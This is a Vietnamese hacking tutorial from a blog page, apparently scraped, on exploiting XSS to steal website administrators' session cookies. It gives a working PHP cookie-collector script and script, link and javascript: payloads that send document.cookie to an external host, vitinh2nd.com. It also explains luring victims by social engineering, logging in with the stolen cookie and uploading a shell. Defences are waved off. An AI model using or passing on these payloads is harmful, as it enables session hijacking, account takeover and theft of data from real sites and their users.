Khai Thác Lỗi XSS Thế Nào? - Juno_okyo
Có thể bạn quan tâm
J2TEAM Security: A must-have extension for Chrome users. Install now!
Lỗi xss là lỗi cho phép thực thi trái phép script trái phép trên client người dùng có thể tham khảo thêm tại đây Cross Site Scripting Thường thì trước kìa tại hạ quậy phá cho phép thực thi câu lệnh:
chúng ta thực hiện câu lệnh trên và so sánh cookie của firebug
Hey ya, nó khác rồi, không khai thác được, nếu nó lỗi xss thì cho nó về trang tươi mát cho bỏ tức. Chúng ta tìm site khác. giả sử có 1 site mô đó lỗi xss và lấy được cooki, chúng ta sẽ viết 1 script cho return về trang của mình để lưu cookie xong rồi return nó về trang nào đó tùy mình, mục đích là lấy được cooki thôi mà. Giả sử mình có một host free php đi, chúng ta vào tạo 1 file có tên là cc.php và 1 file text có tên là cookie.txt file cc.php
Kết luận: có phải xss là cách duy nhất để lấy cookie? Cũng có nhiều cách ví dụ như những các sau: ví dụ vào một trang mà có editor có cho phép sửa mã html các bạn có thể viết 1 bài dài ca ngợi linh tinh gì đó rồi chèn vào cái link dạng như vào đây xem tiếp:
- Sitemap
- Disclaimer
- Privacy
- Trang chủ
- Products
- Fshare Code
- URL Shortener
- Shopee Analytics
- ShopeeFood Analytics
- Communities
- J2TEAM Community
- J2TEAM Relax
- J2TEAM Girls
- About
- Contact
- More...
- J2TEAM Store
- J2TEAM Security
Lỗi xss là lỗi cho phép thực thi trái phép script trái phép trên client người dùng có thể tham khảo thêm tại đây Cross Site Scripting Thường thì trước kìa tại hạ quậy phá cho phép thực thi câu lệnh: <script> window.location=’”http:///xxxx.yyy”; </script>Trong đó http:///xxxx.yyy là 1 trang tươi mát nào đó mục đích là cho admin giải trí trong những lúc mệt mỏi. Bây giờ gặp site lổi tại hạ không dại gì làm thế nữa, vì làm thế chả làm được gì mà còn giúp nó fix bug nè, rồi giúp nó biết thêm mấy trang tươi mát của mềnh nữa. Khi gặp site lỗi xss vấn đề bây giờ là lấy cookie của admin, sau đó đăng nhập với vai trò là admin rồi thích làm gì thì làm :”> Để test site có lấy được cookie toàn vẹn hay không chúng ta thử test bằng cách gõ vào address câu lệnh đơn giản như sau :
javascript:alert(document.cookie);Ví dụ mình lấy trang http://thamhue.com/forum.php chúng ta đăng nhập vào và dùng firebug để xem cookie như hình
<?php $myFile = "cookie.txt"; $fh = fopen($myFile, ‘a+’); $bien=$_REQUEST['cc'].":".$_REQUEST['url']."\n"; fwrite($fh,$bien); fclose($fh); echo("<script>window.location=’".$_REQUEST['url']."’;</script>"); ?>File cooki.txt để trống và checkmod cho phép đọc&ghi. Ví dụ tại hạ đã làm và đã upload lên file có địa chỉ
http://vitinh2nd.com/cc.phphttp://vitinh2nd.com/cookie.txtKhi gặp site http://xyz.xxx lỗi xss ta tìm viết đoạn script sau :
<script> window.location=”http://vitinh2nd.com/cc.php?cc=”+document.cookie+”&url=http://xyz.xxx”; </script>Giải thích : khi admin vào và thực thi script này thì sẽ chạy đến trang của mềnh rồi save cooki vào file cookie.txt rồi return lại trang gốc, mục đích lưu url để biết domain nào mà khai thác, thứ hai là để thằng admin nào đó gà nó tưởng site bị lỗi gì :”> Vậy là xong, vậy sau khi lấy được cooki mình làm thế nào để đăng nhập :”> các bạn có thể dùng addon Cookie Manager của Firefox để edit và thêm các trường của cooki sau đó F5 rồi đăng nhập như hình:
<a href=”#” onclick=”javascript:window.location=’http://vitinh2nd.com/cc.php?cc=’+document.cookie+’&url=http://xyz.xxx’;” >Click vào đây để xem chi tiết</a>Nó click vào thì thực hiện câu lệnh trên. Cách thứ hai dùng kỹ thuật chém gió lừa tình (social engineering) Dụ victim cái này phải chém cho hay : ví dụ như anh/chị gõ lệnh này trên trình duyệt
javascript:window.location=”http://vitinh2nd.com/cc.php?cc=”+document.cookie+”&url=http://xyz.xxx”;sẽ hack được tiền hay đại loại để xem lỗi hay gì gì thế tùy vào bạn. Vậy lỗi xss này có thể khai thác bằng cách đăng nhập vào admin sau đó up shell lên sever rồi lấy dữ liệu của victim. Cách khắc phục thì mấy bác có thể search google, trình độ em chỉ biết có thế có gì sai mấy bác đừng có chém em mà tội. Leader at J2TEAM. Website: https://j2team.dev/ Sao chép Đăng nhận xét
Đăng nhận xét
Cảm ơn bạn đã đọc bài viết!- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.- Hãy viết tiếng Việt có dấu nếu có thể!Popular Posts
J2TEAM Cookies - Chia sẻ tài khoản mà không sợ lộ mật khẩu
J2TEAM Cookies là một extension tớ code cho ông anh dùng cơ mà nhân tiện up lên Chrome Store luôn để cho mọi người cùng sử dụng. Nó giúp các …2012 Dorks & Shell
PhpFox 3.0.1 Cross Site Scripting (XSS)
Hướng dẫn bảo vệ bạn chống lại các Hacker
Google Hacking DataBase (GHDB)
Labels
TUTORIALS Exploit Security SQL Injection Tools XSS Software PHP AutoIT J2TEAMTừ khóa » Khai Thác Lỗi Xss
-
Lỗ Hổng XSS Và Demo Khai Thác Lỗ Hổng XSS - Viblo
-
Kỹ Thuật Tấn Công XSS Và Cách Ngăn Chặn - Viblo
-
Các Kiểu Khai Thác XSS - Phần 1: Reflected XSS - SecurityDaily.NET
-
Khai Thác Lỗi XSS Trong WordPress | CyStack Security
-
XSS Là Gì? Tầm Nguy Hiểm Và Cách Khắc Phục Lỗ Hổng XSS
-
Các Kiểu Khai Thác Lỗ Hổng XSS - Tấn Công Web Bằng Javascript
-
Lỗ Hổng XSS – Tấn Công Lấy Cắp Phiên đăng Nhập Của Người Dùng
-
Kiến Thức Cơ Bản Về Cross-Site Scripting (XSS): Lỗ Hổng Thú Vị Mới ...
-
Web8: Các Kiểu Khai Thác XSS - Phần 2: Stored XSS
-
Tìm Hiểu Về Lỗ Hổng Cross-Site Scripting - FLINTERS Developer's Blog
-
Khai Thác Lỗ Hổng CSRF Và XSS Trên BWAPP By Kimhuent
-
Lỗi Xss Là Gì ? Làm Sao Để Khắc Phục Nó Các Kiểu Khai Thác Xss
-
Web9: Các Kiểu Khai Thác XSS – Phần 2: Stored XSS
-
Khai Thác Lỗ Hổng CSRF Và XSS Trên BWAP - Tài Liệu Text - 123doc